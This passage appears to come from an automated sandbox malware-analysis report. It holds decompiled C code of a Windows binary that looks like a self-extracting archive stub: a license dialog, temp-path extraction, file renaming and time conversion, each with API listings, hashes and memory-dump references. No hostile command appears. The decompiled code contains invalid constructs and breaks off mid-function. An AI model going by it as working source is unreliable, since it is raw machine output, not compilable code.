									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x28ea62
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0027E203(_t135, _v8 ^ _t136);
			}

0x0028e2f5
0x0028e2fc
0x0028e2ff
0x0028e307
0x0028e30b
0x0028e317
0x0028e31a
0x0028e31d
0x0028e324
0x0028e32c
0x0028e32f
0x0028e335
0x0028e33b
0x0028e340
0x0028e342
0x0028e345
0x0028e34a
0x0028e354
0x0028e35b
0x0028e35e
0x0028e365
0x0028e36c
0x0028e398
0x0028e3be
0x0028e3c0
0x00000000
0x0028e39a
0x0028e39d
0x0028e464
0x0028e470
0x0028e47b
0x0028e480
0x0028e3a3
0x0028e3aa
0x0028e3af
0x0028e3b5
0x0028e3bb
0x00000000
0x0028e3bb
0x0028e3b5
0x0028e39d
0x0028e36e
0x0028e372
0x0028e375
0x0028e37b
0x0028e37d
0x0028e380
0x0028e384
0x0028e3c1
0x0028e3c4
0x0028e3c5
0x0028e3ca
0x0028e3d0
0x0028e3d6
0x0028e3e5
0x0028e3eb
0x0028e3f1
0x0028e3f6
0x0028e3fe
0x0028e412
0x0028e485
0x0028e48b
0x0028e414
0x0028e414
0x0028e41c
0x0028e425
0x0028e42b
0x00000000
0x0028e42d
0x0028e42f
0x0028e432
0x0028e436
0x0028e44b
0x00000000
0x0028e44d
0x0028e451
0x0028e453
0x0028e456
0x00000000
0x0028e456
0x0028e451
0x0028e44b
0x0028e42b
0x0028e425
0x0028e412
0x0028e3f6
0x0028e3d0
0x00000000
0x0028e459
0x0028e459
0x0028e48d
0x0028e49f

APIs

GetConsoleCP.KERNEL32 ref: 0028E32F
__fassign.LIBCMT ref: 0028E3AA
__fassign.LIBCMT ref: 0028E3C5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0028E3EB
WriteFile.KERNEL32(?,00000000,00000000,b(,00000000), ref: 0028E40A
WriteFile.KERNEL32(?,00000000,00000001,b(,00000000), ref: 0028E443

Strings

b(, xrefs: 0028E3FE, 0028E436, 0028E401, 0028E439

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: b(
API String ID: 1324828854-17843068
Opcode ID: 3e41d000aaf98a80864dde28f3010222d16617f668d7f811cd2a85b1a14537ef
Instruction ID: 90dbc78846f121706f3e41cfb0d1847cac6113bdce180195045e969a2f62bdd1
Opcode Fuzzy Hash: 3e41d000aaf98a80864dde28f3010222d16617f668d7f811cd2a85b1a14537ef
Instruction Fuzzy Hash: 9B51E5B4A11249EFCF10DFA8E885AEEBBF9FF08300F15415AE965E7291D7309954CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0027A3E1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0027A3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				intOrPtr _t31;
				struct HWND__* _t35;
				intOrPtr _t36;
				void* _t37;
				struct HWND__* _t38;

				_t28 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				if(E002612D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t37 = _t36 - 0x110;
				if(_t37 == 0) {
					E0027C343(__edx, __eflags, __fp0, _t35);
					_t9 =  *0x2ab704;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t35, 0x80, 1, _t9);
					}
					_t10 =  *0x2b5d04;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0x2bde1c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t35, _t11);
					}
					_t38 = GetDlgItem(_t35, 0x65);
					SendMessageW(_t38, 0x435, 0, 0x10000);
					SendMessageW(_t38, 0x443, 0,  *0x29df40(0xf));
					 *0x29df3c(_t35);
					_t31 =  *0x2a75ec; // 0x0
					E00278FE6(_t31, __eflags,  *0x2a0064, _t38,  *0x2bde18, 0, 0);
					L00282B4E( *0x2bde1c);
					L00282B4E( *0x2bde18);
					goto L16;
				}
				if(_t37 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t35, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0027a3e2
0x0027a3e8
0x0027a3ef
0x0027a408
0x0027a4ee
0x0027a4f0
0x00000000
0x0027a4f0
0x0027a40e
0x0027a414
0x0027a441
0x0027a446
0x0027a451
0x0027a453
0x0027a45e
0x0027a45e
0x0027a460
0x0027a465
0x0027a467
0x0027a473
0x0027a473
0x0027a479
0x0027a47e
0x0027a480
0x0027a484
0x0027a484
0x0027a499
0x0027a4a1
0x0027a4b3
0x0027a4b6
0x0027a4bc
0x0027a4d1
0x0027a4dc
0x0027a4e7
0x00000000
0x0027a4ed
0x0027a419
0x0027a428
0x00000000
0x0027a428
0x0027a41e
0x0027a421
0x0027a43c
0x0027a430
0x0027a431
0x00000000
0x0027a431
0x0027a426
0x0027a42f
0x00000000
0x0027a42f
0x00000000

APIs

Part of subcall function 002612D7: GetDlgItem.USER32(00000000,00003021), ref: 0026131B
Part of subcall function 002612D7: SetWindowTextW.USER32(00000000,002922E4), ref: 00261331

EndDialog.USER32(?,00000001), ref: 0027A431
SendMessageW.USER32(?,00000080,00000001,?), ref: 0027A45E
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0027A473
SetWindowTextW.USER32(?,?), ref: 0027A484
GetDlgItem.USER32(?,00000065), ref: 0027A48D
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0027A4A1
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0027A4B3

Strings

LICENSEDLG, xrefs: 0027A3F5

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 0ad633002082e8ae92af761672c088aed5f1c1080d2f6e15a13bac443f0f6c09
Instruction ID: 473232a2592abae0c453d7208fd9e3ad1a6380686ccf530a400a9299c95187c5
Opcode Fuzzy Hash: 0ad633002082e8ae92af761672c088aed5f1c1080d2f6e15a13bac443f0f6c09
Instruction Fuzzy Hash: 8521B1322642157BD2115F35FC9EF7F7B6CEB86B94F008005F605A60A0CBA2A821A632

Uniqueness

Uniqueness Score: -1.00%

Function 00269268, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00269268(void* __ecx) {
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t82;
				WCHAR* _t83;
				void* _t85;
				void* _t87;

				E0027D870(E00291336, _t85);
				E0027D940();
				_t83 =  *(_t85 + 8);
				_t31 = _t85 - 0x4030;
				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t92 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *(_t85 + 8) = E0026B943(_t92, _t85 - 0x4030);
							_t78 = E0026B943(_t92, _t85 - 0x5030);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00271410( *(_t85 + 8), _t78);
								_t94 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00271410(E0026B943(_t94, _t83), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t85 - 0x100c) = _t41;
										_t79 = 0;
										while(1) {
											_t96 = _t41;
											if(_t41 != 0) {
												break;
											}
											E0026FAB1(_t85 - 0x100c, _t83, 0x800);
											E00263E41(E0026B943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
											_t87 = _t87 + 0x10;
											if(E00269E6B(_t85 - 0x100c) == 0) {
												_t41 =  *(_t85 - 0x100c);
											} else {
												_t41 = 0;
												 *(_t85 - 0x100c) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t99 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E0026FAB1(_t85 - 0x3030, _t83, 0x800);
										_push(0x800);
										E0026B9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
											goto L20;
										} else {
											E0026943C(_t85 - 0x2030);
											 *((intOrPtr*)(_t85 - 4)) = _t68;
											if(E00269E6B(_t83) == 0) {
												_push(0x12);
												_push(_t83);
												_t68 = E00269528(_t85 - 0x2030);
											}
											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
											if(_t68 != 0) {
												E002694DA(_t85 - 0x2030);
												E00269621(_t85 - 0x2030);
											}
											E0026946E(_t85 - 0x2030);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t32;
			}

0x0026926d
0x00269277
0x0026927e
0x00269281
0x00269290
0x00269298
0x00269427
0x00269427
0x00269427
0x002692a6
0x002692af
0x002692b7
0x00000000
0x002692bd
0x002692bd
0x002692bf
0x00000000
0x002692c5
0x002692d1
0x002692e0
0x002692e2
0x002692e7
0x00000000
0x002692ed
0x002692f1
0x002692f6
0x002692f8
0x00000000
0x002692fe
0x00269306
0x0026930d
0x00000000
0x00269313
0x00269313
0x0026931a
0x0026931c
0x0026931c
0x0026931f
0x00000000
0x00000000
0x0026932e
0x0026934b
0x00269350
0x00269361
0x0026936e
0x00269363
0x00269363
0x00269365
0x00269365
0x00269375
0x0026937e
0x00000000
0x00269380
0x00269380
0x00269383
0x00000000
0x00000000
0x00000000
0x00000000
0x00269383
0x00000000
0x0026937e
0x00269397
0x0026939c
0x002693a7
0x002693c4
0x00000000
0x002693c6
0x002693cc
0x002693d2
0x002693dc
0x002693de
0x002693e0
0x002693ec
0x002693ec
0x002693fc
0x00269400
0x00269408
0x00269413
0x00269413
0x0026941e
0x00269423
0x00269423
0x002693c4
0x0026930d
0x002692f8
0x002692e7
0x002692bf
0x002692b7
0x00269429
0x0026942f
0x00269439

APIs

__EH_prolog.LIBCMT ref: 0026926D
GetLongPathNameW.KERNEL32 ref: 00269290
GetShortPathNameW.KERNEL32 ref: 002692AF

Part of subcall function 00271410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0026ACFE,?,?,?,0026ACAD,?,-00000002,?,00000000,?), ref: 00271426

_swprintf.LIBCMT ref: 0026934B

Part of subcall function 00263E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00263E54

MoveFileW.KERNEL32 ref: 002693C0
MoveFileW.KERNEL32 ref: 002693FC

Strings

rtmp%d, xrefs: 00269334

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: f5c4ed54b501aeccbcf342e2da828deeb8379fe0b5286e13fbc433f6598018bf
Instruction ID: edb87f8a6fd85f2d85b1da69b6f8de5da57f873d6687118e8cca89398911b0d5
Opcode Fuzzy Hash: f5c4ed54b501aeccbcf342e2da828deeb8379fe0b5286e13fbc433f6598018bf
Instruction Fuzzy Hash: 78417D76925219A6DF21EFA0DD85EEE737CAF44381F0044A5B509E3142EE349BE9CF60

Uniqueness

Uniqueness Score: -1.00%

Function 002788BF, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E002788BF(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t67;
				long _t69;
				void* _t71;
				void* _t72;

				_t58 = __edx;
				_t43 = _t44;
				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t71 + 0x18));
				 *((char*)(_t71 + 0x1c)) = E002787A5(_t60);
				_push(0x200 + E00282B33(_t60) * 2);
				_t24 = E00282B53(_t44);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00284D7E(_t64, L"<html>");
				E002866ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E002866ED(_t64, L"utf-8\"></head>");
				_t72 = _t71 + 0x18;
				_t67 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00271432(_t76, _t67, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
					if(_t31 != 0) {
						_t60 = _t67 + 0xc;
					}
					E002866ED(_t64, _t60);
					if( *((char*)(_t72 + 0x1c)) == 0) {
						E002866ED(_t64, L"</html>");
					}
					_t79 =  *((char*)(_t72 + 0x1c));
					if( *((char*)(_t72 + 0x1c)) == 0) {
						_push(_t64);
						_t64 = E00278ACA(_t58, _t79);
					}
					_t69 = 9 + E00282B33(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t69);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00282B4E(_t64);
					_t24 =  *0x29dff8(_t62, 1, _t72 + 0x10);
					if(_t24 >= 0) {
						E002787DC( *((intOrPtr*)(_t43 + 0x10)));
						_t38 =  *((intOrPtr*)(_t72 + 0xc));
						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t67 = _t67 + 2;
					_t76 =  *_t67 - _t28;
				} while ( *_t67 == _t28);
				goto L4;
			}

0x002788bf
0x002788c2
0x002788c8
0x00278a04
0x00278a04
0x002788ce
0x002788d5
0x002788e0
0x002788f0
0x002788f1
0x002788f6
0x002788fc
0x002789ff
0x00000000
0x00278a00
0x00278909
0x00278914
0x0027891f
0x00278924
0x00278927
0x0027892b
0x0027892f
0x0027893a
0x00278942
0x00278949
0x0027894b
0x0027894d
0x00278951
0x00278953
0x00278953
0x00278958
0x00278964
0x0027896c
0x00278972
0x00278973
0x00278978
0x0027897a
0x00278982
0x00278982
0x0027898e
0x0027899a
0x0027899e
0x002789a8
0x002789bd
0x002789ca
0x002789bf
0x002789bf
0x002789c4
0x002789c4
0x002789bd
0x002789ce
0x002789dc
0x002789e5
0x002789f0
0x002789f5
0x002789fc
0x002789fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00278931
0x00278931
0x00278931
0x00278934
0x00278934
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002787A0), ref: 00278994
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002789B5
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 002789DC

Strings

<html>, xrefs: 00278903, 0027893C
</html>, xrefs: 00278966
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 0027890E
utf-8"></head>, xrefs: 00278919

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: 072776473427c4665b079538919cce6ef9fe6f527cf7dbed382fa51d6e977ba7
Instruction ID: 2ffc6aba6df90b47633f63ed7e08fd98eb9a00b08b50a4bf442f920d82d1e529
Opcode Fuzzy Hash: 072776473427c4665b079538919cce6ef9fe6f527cf7dbed382fa51d6e977ba7
Instruction Fuzzy Hash: 1B312736066312BED714AF609C0EF6B779CDF42320F14850AF519961C2EF7499258BA6

Uniqueness

Uniqueness Score: -1.00%

Function 002706E0, Relevance: 12.1, APIs: 8, Instructions: 117
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E002706E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t92;
				signed int _t94;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E0027DEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E0026A995() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebp");
					asm("adc ecx, ebp");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebp");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t92 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t94 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t92[3] = _v48.wHour & 0x0000ffff;
				_t92[4] = _v48.wMinute & 0x0000ffff;
				_t92[5] = _v48.wSecond & 0x0000ffff;
				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t92 = _v48.wYear & 0x0000ffff;
				_t92[1] = _t94;
				_t92[2] = _t85;
				_t92[8] = _t85 - 1;
				if(_t94 > 1) {
					_t89 = 0x29d084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t92[8] = _t92[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t94) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t94 > 2 && E00270849(_t88) != 0) {
					_t92[8] = _t92[8] + 1;
				}
				_t73 = E0027DF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t92[6] = _t73;
				return _t73;
			}

0x002706e0
0x002706e7
0x002706f8
0x002706fc
0x00270710
0x0027072e
0x0027073b
0x00270751
0x0027075d
0x0027076b
0x00270773
0x00270779
0x0027077f
0x00270783
0x00270785
0x00270712
0x0027071c
0x0027071c
0x00270793
0x00270795
0x002707a0
0x002707a1
0x002707a6
0x002707ab
0x002707b0
0x002707b8
0x002707c0
0x002707c8
0x002707ce
0x002707d0
0x002707d3
0x002707d6
0x002707db
0x002707df
0x002707e4
0x002707e5
0x002707ec
0x002707ef
0x002707f2
0x002707f5
0x002707f8
0x00000000
0x00000000
0x00000000
0x002707f8
0x002707fa
0x002707fa
0x00270802
0x0027080e
0x0027080e
0x0027081d
0x00270823
0x0027082c

APIs

__aulldiv.LIBCMT ref: 002706F3

Part of subcall function 0026A995: GetVersionExW.KERNEL32(?), ref: 0026A9BA

FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0027071C
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0027072E
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0027073B
SystemTimeToFileTime.KERNEL32(?,?), ref: 00270751
SystemTimeToFileTime.KERNEL32(?,?), ref: 0027075D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00270793
__aullrem.LIBCMT ref: 0027081D

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 72b2af1f7437cbe5df290f4a94337848cb16f03cd1829677579c69d531cb4e64
Instruction ID: 8b503ae061e1ffe7596378bbc7ad75f09c2454962e35dc36497f9cee640511c3
Opcode Fuzzy Hash: 72b2af1f7437cbe5df290f4a94337848cb16f03cd1829677579c69d531cb4e64
Instruction Fuzzy Hash: 674118B2408305AFC714DF65C8809ABF7F8FF88714F008A2EF59A92650E775E558CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0027BB5B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0027BB5B(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t209;
				void* _t210;
				intOrPtr _t263;
				WCHAR* _t277;
				void* _t279;
				WCHAR* _t280;
				void* _t285;

				L0:
				while(1) {
					L0:
					_t263 = __ebx;
					if(__ebx != 1) {
						goto L112;
					}
					L96:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E0026AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L98:
						_push( *0x29d5f8);
						__ebp - 0x7c84 = E00263E41(0x2a85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E00269E6B(0x2a85fa);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L97:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L99:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x2a85fa);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L164:
							_push(0x1000);
							_t197 = _t285 - 0xe; // 0xffffa36e
							_t198 = _t285 - 0xd; // 0xffffa36f
							_t199 = _t285 - 0x5c84; // 0xffff46f8
							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t285 + 0xc)));
							_t209 = E0027A156();
							_t263 =  *((intOrPtr*)(_t285 + 0x10));
							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
							if(_t209 != 0) {
								_t210 = _t285 - 0x5c84;
								_t279 = _t285 - 0x1bc8c;
								_t277 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00271410(_t285 - 0xfc8c,  *((intOrPtr*)(0x29d618 + _t280 * 4))) != 0) {
								_t280 =  &(_t280[0]);
								if(_t280 < 0xe) {
									continue;
								} else {
									goto L164;
								}
							}
							__eflags = _t280 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t280 * 4 +  &M0027C0D7))) {
								case 0:
									L9:
									__eflags = _t263 - 2;
									if(_t263 != 2) {
										goto L164;
									}
									L10:
									_t282 = 0x800;
									E002795F8(_t285 - 0x7c84, 0x800);
									E0026A188(E0026B625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
									 *(_t285 - 4) = _t277;
									E0026A2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
									E00266EF9(_t285 - 0x3c84);
									_push(_t277);
									_t271 = _t285 - 0x8c8c;
									_t224 = E0026A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
									__eflags = _t224;
									if(_t224 == 0) {
										L26:
										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
										E0026A19E(_t285 - 0x8c8c);
										goto L164;
									} else {
										goto L13;
										L14:
										E0026B1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
										E0026AEA5(__eflags, _t285 - 0x103c, _t282);
										_t284 = E00282B33(_t285 - 0x7c84);
										__eflags = _t284 - 4;
										if(_t284 < 4) {
											L16:
											_t252 = E0026B5E5(_t285 - 0x5c84);
											__eflags = _t252;
											if(_t252 != 0) {
												goto L26;
											}
											L17:
											_t254 = E00282B33(_t285 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
											E0027E920(_t277, _t285 - 0x3c, _t277, 0x1e);
											_t287 = _t287 + 0x10;
											 *((intOrPtr*)(_t285 - 0x38)) = 3;
											_push(0x14);
											_pop(_t257);
											 *((short*)(_t285 - 0x2c)) = _t257;
											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
											_push(_t285 - 0x3c);
											 *0x29def4();
											goto L18;
										}
										L15:
										_t262 = E00282B33(_t285 - 0x103c);
										__eflags = _t284 - _t262;
										if(_t284 > _t262) {
											goto L17;
										}
										goto L16;
										L18:
										_t229 = GetFileAttributesW(_t285 - 0x3c84);
										__eflags = _t229 - 0xffffffff;
										if(_t229 == 0xffffffff) {
											L25:
											_push(_t277);
											_t271 = _t285 - 0x8c8c;
											_t231 = E0026A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
											__eflags = _t231;
											if(_t231 != 0) {
												_t282 = 0x800;
												L13:
												SetFileAttributesW(_t285 - 0x3c84, _t277);
												__eflags =  *((char*)(_t285 - 0x2c78));
												if(__eflags == 0) {
													goto L18;
												}
												goto L14;
											}
											goto L26;
										}
										L19:
										_t233 = DeleteFileW(_t285 - 0x3c84);
										__eflags = _t233;
										if(_t233 != 0) {
											goto L25;
